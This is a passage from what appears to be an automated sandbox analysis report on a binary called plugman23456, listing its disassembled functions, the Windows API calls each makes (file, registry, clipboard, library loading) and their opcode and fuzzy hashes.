                          Similarity
                          • API ID: File$PointerRead
                          • String ID:
                          • API String ID: 3154509469-0
                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                          Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfile$StringWrite_itowmemset
                          • String ID:
                          • API String ID: 4232544981-0
                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                          Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                          Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$FileModuleName
                          • String ID:
                          • API String ID: 3859505661-0
                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                          Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                          Download Yara Rule
                          APIs
                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                          Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                          Download Yara Rule
                          APIs
                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000), ref: 0040A325
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                          Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                          Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                          • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                          Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                          Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                          Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                          Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                          Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                          Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: EnumNamesResource
                          • String ID:
                          • API String ID: 3334572018-0
                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                          Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                          Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                          Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                          Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                          Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                          Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004095FC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                          • String ID:
                          • API String ID: 3655998216-0
                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                          Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00445426
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                          • String ID:
                          • API String ID: 1828521557-0
                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                          Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                          • memcpy.MSVCRT ref: 00406942
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@FilePointermemcpy
                          • String ID:
                          • API String ID: 609303285-0
                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                          Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID:
                          • API String ID: 2081463915-0
                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                          Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$CloseCreateErrorHandleLastRead
                          • String ID:
                          • API String ID: 2136311172-0
                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                          Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@
                          • String ID:
                          • API String ID: 1936579350-0
                          • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                          • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                          Non-executed Functions

                          Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • EmptyClipboard.USER32 ref: 004098EC
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                          • GetLastError.KERNEL32 ref: 0040995D
                          • CloseHandle.KERNEL32(?), ref: 00409969
                          • GetLastError.KERNEL32 ref: 00409974
                          • CloseClipboard.USER32 ref: 0040997D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                          • String ID:
                          • API String ID: 2565263379-0
                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                          Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
